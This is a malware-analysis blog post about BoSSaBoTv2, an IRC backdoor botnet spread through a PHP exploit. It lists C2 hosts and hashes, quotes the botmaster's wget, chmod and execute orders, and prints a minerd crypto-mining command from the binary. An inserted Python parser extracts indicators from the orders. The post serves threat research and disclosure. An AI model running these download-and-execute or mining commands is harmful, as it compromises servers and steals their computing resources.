BoSSaBoTv2: another Linux Backdoor IRC (malekal's site)

Today I was looking at my web honeypot and this one caught my attention:

http://www.malekal.com/modsec/index.php?ip=178.32.59.202

This PHP vulnerability is very widely exploited (I already wrote about it: http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ), but it was the first time I saw this base64decode code.

The code leads to haxmeup.uni.me (192.95.12.34, OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg

I expected to get a PHP shellbot as usual, but this time it was a FUD (fully undetected) binary:

https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

So I launched it:

It made a connection to 37.59.74.161 (OVH again) on port 8067; there is an ircd behind it:

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT     STATE SERVICE VERSION
8067/tcp open  irc     Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

So, an IRC backdoor.

Another surprise: the ircd doesn't have any mode set to hide users, etc. About 40 bots, not that many.

So let’s play.

On the screenshot, we can see that the botmaster launches an IP range scan, then some bots exploit some servers.

We can see that the exploit against 200.185.236.85 was successful, because it joins the channel as a new bot.

This is confirmed by my VM.

We get another domain, con32.cz.cc, that resolves to the same IP, 192.95.12.34.

Two new bots:

The IRCd is new: around 40 bots in 9 days:

The botmaster regularly has the bots download new binaries, all from www.bilder-upload.eu (which seems legitimate):

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab

Some hashes and hosts recap:

haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34, OVH)
haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e

Then I wrote a little script to send the abuse emails; hopefully they will lose some bots.

MalwareMustDie decompiled the binary; some strings: http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6

Thanks to them. Bitcoin mining capabilities:

000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20 pkill minerd ; pkill m32 ; pkill m64
000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.
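As an added example (not the author's script and not code from the bot kit), here is a small Python parser for the "!BOSS* SH" orders quoted above that pulls out the download URLs, the dropped and executed paths, flags the wget, mv, chmod, run staging chain onto a single /tmp path, and notes cpuminer/stratum orders like the minerd string above. The IRC framing, nicks, channel name and stratum pool address in the sample capture are constructed for the example.

```python
import re

# Botmaster order as seen on the channel: "!BOSS<mask> SH <shell command>".
# The mask ("*" in the captures) selects which bots obey; any mask is accepted.
BOSS_RE = re.compile(r"!BOSS\S*\s+SH\s+(?P<cmd>.+?)\s*$")
# IRC framing for lines taken from a pcap or proxy log rather than a screenshot.
PRIVMSG_RE = re.compile(r"^:\S+\s+PRIVMSG\s+\S+\s+:(?P<text>.*)$")
# Download targets with or without a scheme (the embedded cpuminer fetch has none).
URL_RE = re.compile(r"(?:https?://)?[\w.-]+\.[a-z]{2,}/\S+", re.I)
MINER_NAMES = {"minerd", "m32", "m64"}   # names from the pkill string in the binary

def shell_command(line):
    """Return the shell command carried by a BoSSaBoT 'SH' order, else None."""
    m = PRIVMSG_RE.match(line)
    text = m.group("text") if m else line
    m = BOSS_RE.search(text)
    return m.group("cmd") if m else None

def extract_indicators(lines):
    """Collect URLs, dropped and executed paths; flag the wget -> mv -> chmod -> run
    chain onto one path ("staged") and any cpuminer/stratum activity ("mining")."""
    urls, dropped, executed, chmodded, mining = [], [], [], set(), False
    for line in lines:
        cmd = shell_command(line)
        if cmd is None:
            continue
        argv = cmd.split()
        urls += URL_RE.findall(cmd)
        if argv[0] == "mv" and len(argv) >= 3:
            dropped.append(argv[-1])           # destination of the rename
        elif argv[0] == "chmod" and len(argv) >= 3:
            chmodded.add(argv[-1])
        elif argv[0].startswith("/"):          # direct execution of a dropped file
            executed.append(argv[0])
        if "stratum+" in cmd or argv[0].rsplit("/", 1)[-1] in MINER_NAMES:
            mining = True
    staged = [p for p in executed if p in chmodded and p in dropped]
    return {"urls": urls, "dropped": dropped, "executed": executed,
            "staged": staged, "mining": mining}

# Constructed channel capture modelled on the orders quoted in the post; the IRC
# framing, nicks, channel name and the stratum pool address are invented.
SAMPLE_LOG = [
    ":boss!~b@example.invalid PRIVMSG #c :!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp",
    ":boss!~b@example.invalid PRIVMSG #c :!BOSS* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4L2nJG5Vab",
    ":boss!~b@example.invalid PRIVMSG #c :!BOSS* SH chmod 777 /tmp/4L2nJG5Vab",
    ":boss!~b@example.invalid PRIVMSG #c :!BOSS* SH /tmp/4L2nJG5Vab",
    ":boss!~b@example.invalid PRIVMSG #c :!BOSS* SH /tmp/minerd -t 4 -o stratum+tcp://pool.example.invalid:3333 -O u:p -q -B 2>/dev/null &",
    ":bot42!~u@example.invalid JOIN #c",
]
```

Running extract_indicators(SAMPLE_LOG) over a real channel capture gives the URLs to report to the image host and the /tmp paths to hunt for on suspected bots.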

The most interesting:

000000007E1D BoSSaBoTv2-%s

A Google search turns up this topic: http://www.hackforums.net/showthread.php?tid=4395309

According to the post date, the kit is new and the price is $100.

Back. Lots of attacks this weekend:
http://www.malekal.com/modsec/index.php?ip=213.73.31.13
http://www.malekal.com/modsec/index.php?ip=195.154.140.251
http://www.malekal.com/modsec/index.php?ip=5.135.64.105
http://www.malekal.com/modsec/index.php?ip=46.105.230.91
http://www.malekal.com/modsec/index.php?ip=128.233.173.167

The binaries are undetected:

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd: 23.95.10.101, port 53

2 Comments

sneezing_panda

Posted on 8 September 2014 at 4:28

He’s an idiot. http://puu.sh/bqOYA/ebec4b2878.png People are already complaining on the HF thread.

CyD

Posted on 8 September 2014 at 10:52

Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please report this kind of cybercrime activity to federal law enforcement. Keep up the good work.
